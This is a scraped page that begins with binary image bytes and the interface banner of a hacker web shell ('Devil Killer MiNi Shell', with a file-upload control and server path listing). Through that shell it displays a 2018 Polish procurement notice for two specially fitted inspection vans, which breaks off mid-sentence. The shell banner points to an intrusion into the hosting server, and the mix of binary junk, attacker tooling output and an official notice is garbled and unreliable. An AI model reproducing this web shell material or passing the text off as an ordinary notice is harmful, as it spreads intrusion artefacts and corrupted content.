JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20181023/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20181023/639732-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 639732-N-2018 z dnia 2018-10-23 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Wojewódzki Inspektorat Transportu Drogowego we Wrocławiu</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa dwóch fabrycznie nowych samochodów ze specjalistyczną zabudową biurową na uzytek Wojewódzkiego Inspektoratu Transportu Drogowego we Wrocławiu</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Wojewódzki Inspektorat Transportu Drogowego we Wrocławiu</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">93272117500000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Krzywoustego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">28</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">51165 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Wrocław</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">dolnośląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">713 265 160</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">coczkowicz@dolnyslask.witd.gov.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">713 265 161</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.dolnyslask.witd.gov.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja rządowa terenowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.dolnyslask.witd.gov.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.dolnyslask.witd.gov.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Wojewódzki Inspektorat Transportu Drogowego we Wrocławiu, ul. B.Krzywoustego 28, 51-165 Wrocław</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa dwóch fabrycznie nowych samochodów ze specjalistyczną zabudową biurową na uzytek Wojewódzkiego Inspektoratu Transportu Drogowego we Wrocławiu</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">WAT.272.1.002.002.2018.CO.</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Specyfikacja techniczna samochodu specjalnego ze specjalistyczną zabudową biurową.LP.	Wymagania zamawiającego1.	Samochód fabrycznie nowy - rok produkcji 2018.2.	Dopuszczalna masa całkowita do 3,5 t.3.	Nadwozie zamknięte o konstrukcji samonośnej typu ,,furgon" częściowo przeszklony.4.	Kabina kierowcy trzyosobowa, liczba ta musi wynikać z homologacji oferowanych samochodów. Kierownica musi znajdować się po lewej stronie. 5.	Wymiary przedziału przeznaczonego do zabudowy: długość minimalna 3 400 mm, wysokość minimalna 1800 mm, szerokość minimalna 1700 mm - mierzona pomiędzy wewnętrznymi powierzchniami ścian bocznych6.	Drzwi boczne prawe przesuwne z blokadą, przeszklone szybą, z dodatkowym uchwytem ułatwiającym zamykanie i otwieranie drzwi. Druga szyba zamontowana w części biurowej po prawej stronie samochodu. Brak uchylnych lub otwieranych szyb. Szyby przyciemnione technologią ,,przydymiania" lub ,,oklejania".7.	Drzwi tylne pełne (bez szyb) dwuskrzydłowe, z kątem otwarcia min. 250°.8.	Dwie szyby po lewej stronie samochodu, przeciwległe do drzwi przesuwnych. Brak uchylnych lub otwieranych szyb. Szyby przyciemnione technologią ,,przydymiania" lub ,,oklejania".9.	W otworach okiennych ścian bocznych przedziału biurowego na szybie po prawej jak i po lewej stronie ciemne rolety.10.	Elektrycznie ustawiane i podgrzewane lusterka boczne. Elektrycznie otwierane szyby w drzwiach przednich.11.	Przeszklenie ścian bocznych samochodu w części przedziału biurowego z zastosowaniem przyciemnienia w stopniu od 70 do 90%.12.	Nadwozie lakierowane w kolorze ciemnozielonym, z tym, że pokrywa silnika, drzwi kierowcy i pasażera oraz drzwi tylne (pokrywa bagażnika) koloru białego.Zamawiający dopuszcza pomalowanie elementów koloru białego lub ciemnozielonego poza fabryką. Wykonawca zamówienia udzieli gwarancji na wykonanie prac lakierniczych. 13.	Silnik wysokoprężny (diesel) z turbodoładowaniem o pojemności skokowej minimum 2100 cm3mocy minimum 110 KW ( (pojemność oraz moc oferowanego silnika samochodu musi wynikać z jego homologacji). 14.	Norma emisji spalin: Euro 615.	Napędzana przednia lub tylna oś pojazdu.16.	Skrzynia biegów manualna minimum 6-cio biegowa.17.	System kontroli trakcji (ESP lub równoważny).18.	Układ kierowniczy ze wspomaganiem.19.	Kolumna kierownicy, co najmniej z możliwością regulacji w min. w płaszczyźnie pionowej.20.	Układ hamulcowy ze wspomaganiem + ABS + ASR lub równoważne.21.	Hamulce tarczowe wymagane dla obu osi.22.	Co najmniej poduszka powietrzna dla kierowcy i pasażera.23.	Zbiornik paliwa o pojemności min. 75 l.24.	Obręcze stalowe min. 16 cali.25.	Założone opony zimowe z felgami26.	Światła do jazdy dziennej włączane automatycznie. Zamawiający nie dopuszcza ,,Skandynawskiej" funkcji włączania świateł mijania.27.	Reflektory przeciwmgłowe, czujniki parkowania tył.28.	Materiałowa tapicerka siedzeń w ciemnej tonacji odporna na ścieranie.29.	Podłoga przedziału biurowego oraz przedziału magazynowego wykonana z powłoki antypoślizgowej, łatwo zmywalnej, powłoka wywinięta 6 cm na boczną ścianę zabudowy biurowej.30.	Ściany boczne przedziału biurowego i sufit pokryte warstwą izolacji termiczno-dźwiękowej o przenikalności cieplnej max 0,039 (W/mk). Użyte materiały w przedziale biurowym o prędkości spalania nie większej niż 100 mm/min.31.	Po adaptacji pojazdy przystosowane do przewozu min. 3 osób ( z kierowcą) w pozycji siedzącej, dopuszczalna masa całkowita każdego pojazdu do 3,5 tony.32.	Pojazdy winny składać się z dwóch przedziałów: części przeznaczonej dla kierowcy i pasażerów wraz częścią biurową oraz przedziału magazynowego. 33.	Część przeznaczoną dla kierowcy i pasażerów oraz część biurową oddziela ścianka działowa od 80 cm do 100 cm wysokości. 34.	W przedziale biurowym winny zostać zainstalowane : 2 siedziska dla inspektorów oraz 2 siedziska dla osób kontrolowanych. Siedziska dla inspektorów zlokalizowane na lewej ścianie przedziału biurowego, przodem zwrócone w kierunku drzwi wejściowych do przedziału.Siedziska dla kontrolowanych po przeciwległej stronie, na prawej ścianie przedziału.Wszystkie siedzenia w przedziale muszą posiadać poszycie wykonane z materiału odpornego na zużycie mechaniczne (wysoka odporność na ścieranie), łatwe do utrzymania w czystości (łatwo zmywalnego). Pod wszystkim siedziskami powinny znajdować się schowki z możliwością otwierania i systemem samoczynnego podtrzymania otwartej klapy.35.	Dwa stoliki o wymiarach (minimum 550 x 900 mm) pod komputer (laptop), jeden przylegający do ściany działowej z kabiną kierowcy, drugi przylegający do ściany działowej z przedziałem magazynowym. Stolik zamontowany bez punktu podparcia w podłodze. Żadne elementy nośne stolika nie mogą dotykać podłogi w przedziale biurowym. Stoliki usytuowane pomiędzy siedziskami (dla inspektorów i kontrolowanych), zamontowane na szynie przesuwnej, w sposób umożliwiający przesunięcie stolików wzdłuż ścian działowych w celu ułatwienia zajmowania miejsc, z zabezpieczeniem przed przemieszczaniem się stolika podczas jazdy. Wytrzymałość stolików na obciążenie - min. 100 kg. Pod powierzchnią blatu szuflada umożliwiająca przechowywanie dokumentów w formacie A 4 o wysokości max.6 cm. 36.	Na lewej ścianie bocznej przedziału, obok siedziska dla inspektora - szafka przeznaczona do zainstalowania laserowego urządzenia wielofunkcyjnego (drukarka + kserokopiarka) z możliwością przechowywania materiałów eksploatacyjnych. Konstrukcja szafki powinna uwzględniać możliwość zabezpieczenia urządzeń oraz elementów wyposażenia przed ewentualnym przesunięciem w czasie jazdy oraz zapewniać łatwy dostęp i użytkowanie urządzeń bez wykonywania dodatkowych czynności (np. odpinanie pasów mocujących). Wymiary: szerokość 60 cm., wysokość 50 cm, głębokość 45 cm. Zamawiający wymaga wykonania ścięcia prawego rogu o całkowitej długość 50 mm szerokości 50 mm na wpuszczenie kabla zasilającego do prawej szuflady.37.	Przedział biurowy samochodu wyposażony w dwie trwale zamocowaną kasetki metalowe (zamykane na klucz).38.	Na ścianie działowej oddzielającej przedział biurowy od przedziału magazynowego - od strony biurowej zestaw szafek z półkami i szuflad. Część półek i szafek musi umożliwiać przechowywanie w nich segregatorów na dokumenty formatu A4. Również, co najmniej część szuflad powinna być przystosowana do przechowywania dokumentów formatu A4. Należy przewidzieć miejsce na umundurowanie służbowe - wierzchnie- miejsce na garderobę z haczykami.Wykonawca musi dołączyć projekt zabudowy ścianki działowej oraz zabudowy przedziału biurowego do dokumentacji przetargowej.39.	Wszystkie szafki i szuflady zabezpieczone samozatrzaskowymi zamkami, uniemożliwiającymi samoczynne otwarcie się podczas jazdy. 40.	Oświetlenie przedziału biurowego - 4 reflektory LED umieszczone w górnej części przedziału biurowego (możliwości włączania dwóch par reflektorów po przekątnej z osobna lub wszystkich na raz) dodatkowo 1 lampa LED znajdująca się nad drzwiami przesuwnymi załączana automatycznie po otwarciu drzwi bocznych z wyłącznikiem czasowym ustawionym w przedzielę 4-5 minut. Oświetlenie punktowe nad miejscami pracy (tj. nad stolikami pod komputer, punktowe kierunkowe reflektory LED zamontowane w suficie przedziału biurowego). Oświetlenie punktowe dodatkowe załączane z wyłącznika będącego w zasięgu ręki inspektora. Dodatkowo zamocowane lampki LED przy biurkach. W części magazynowej winny być zamontowane 2 lapy LED o świetle rozporoszonym oświetlające całą część magazynu oraz przyległy teren w odległości 1m. Lampy powinny włączać się automatycznie podczas otwarcia drzwi i włączać po ich zamknięciu lub włączane dodatkowym włącznikiem ,,na żądanie" z wyłączniki czasowym ustawionym na 10-12 minut.41.	W przedziale biurowym, w miejscu zapewniającym możliwość prawidłowej obsługi wyposażenia pojazdu będzie znajdować się panel sterujący z wyświetlaczem dotykowym, posiadający następujące funkcje:?	sterowanie oświetleniem wewnętrznym przedziału oraz oświetleniem zewnętrznym pojazdu,?	sterowanie układem ogrzewania dodatkowego przedziału,?	obrazowanie poziomu naładowania dodatkowych akumulatorów oraz dźwiękową sygnalizację niskiego poziomu ich naładowania,?	wyświetlanie aktualnej daty, godziny, temperatury zewnętrznej.?	sterowanie układem klimatyzacji dodatkowego przedziału,?	zabezpieczenie akumulatorów przed głębokim rozładowaniem-odcięcie zasilania przy 11,5 V.42.	Zamontowane w pojeździe meble wykonane z materiałów wodoodpornych, dopuszczonych do stosowania w tego rodzaju zabudowie zgodnie z wymaganymi atestami.43.	Klimatyzacja samochodowa co najmniej z regulacją manualną.44.	Klimatyzacja samochodowa rozbudowana o dodatkowy parownik zamontowany nad kabiną kierowcy, wylot chłodnego powietrza skierowany na przedział biurowy z możliwością ustawiania kierunku nawiewu.45.	Niezależny od silnika system ogrzewania przedziału biurowego o mocy grzewczej co najmniej 3,5kW z możliwością ustawienia temperatury w przedziale i termostatem - ogrzewanie postojowe (układ wydechowy systemu ogrzewania powinien być tak skonstruowany i umieszczony żeby nie powodował przedostawania się spalin do przedziału biurowego przy otwartych drzwiach bocznych).Co najmniej2 wyloty ciepłego powietrza z układu ogrzewania rozmieszczone równomiernie w całym przedziale biurowym, zapewniające jednakową temperaturę w całej przestrzeni przedziału. Elementy wyposażenia elektrycznego przedziału zabezpieczone przed bezpośrednim oddziaływaniem ciepłego powietrza z wylotów układu ogrzewania. Wyloty ciepłego powietrza nie powinny być umieszczone bezpośrednio przy siedzeniach przeznaczonych dla kontrolujących.46.	Ściana działowa pomiędzy przedziałem magazynowym, a przedziałem biurowym po stronie magazynowej zabudowana otwartymi półkami(konstrukcja z profili aluminiowych). Półki wyposażone w zamontowane uchwyty umożliwiające unieruchomienie za pomocą linek lub pasów przewożonych urządzeń i wyposażenia. W dolnej części zabudowy przedziału magazynowego miejsce na wagi przewoźne o wymiarach jednego segmentu ok. 855 mm x 530 mm x 90 mm (minimum dla dwóch segmentów). Z uwagi na ciężar wag (ok. 20 kg dla jednego segmentu) zaprojektowane rozwiązanie powinno zapewniać możliwie równomierne rozłożenie nacisku na tylną oś pojazdu. Miejsca na wagi (podłogi schowka na wagi) wyłożyć blachą np. aluminiową - ze względu na konstrukcję wnęki. Przewidziane miejsce na urządzenie do badania stopnia zadymienia spalin (dymomierza o wymiarach 60x30x30cm). Sposób zabudowy powinien zapewniać bezpieczne mocowanie urządzeń. Sposób montażu musi umożliwiać łatwy i szybki demontaż urządzenia. Przewidziane miejsce na minimum cztery pachołki drogowe. Przymiar wysokości , lustro, apteczka.Wykonawca musi dołączyć projekt zabudowy przestrzeni magazynowej do dokumentacji przetargowej.47.	W części magazynowej na tylnych drzwiach zamontowany zbiornik na wodę do mycia rąk. Obieg wody grawitacyjny, zapewniony łatwy dostęp. Zamawiający wymaga założenie dodatkowego przewodu gumowego od kranu do dolnej krawędzi drzwi zamontowanego na stałe.48.	Zespół 2 dodatkowych bezobsługowych akumulatorów żelowych (niezależnych od akumulatora fabrycznie zainstalowanego w pojeździe) o łącznej pojemności min.400 Ah. Do zestawu akumulatorów podłączona przetwornica prądu z 12 na 230 V, zapewniająca wyjściowy prąd zmienny o pełnej sinusoidzie, umożliwiająca uzyskanie w gniazdach napięcia 230 V (o mocy min. 2000 WAT) wraz z instalacją przyłączeniową umożliwiającą zasilanie wewnętrznych odbiorników prądu (dwa komputery, laserowe urządzenie wielofunkcyjne, wagi przenośne, dymomierz). Zamontowana instalacja powinna zapewniać możliwość jednoczesnego użytkowania wszystkich wymienionych urządzeń jednocześnie oraz zabezpieczać obwód drukarki - kserokopiarki przed chwilowymi spadkami napięcia. Zamawiający w razie potrzeby zobowiązuje się wypożyczyć Wykonawcy na czas wykonywania zabudowy jeden zestaw przewidywanych do użytku urządzeń, w celu przeprowadzenia 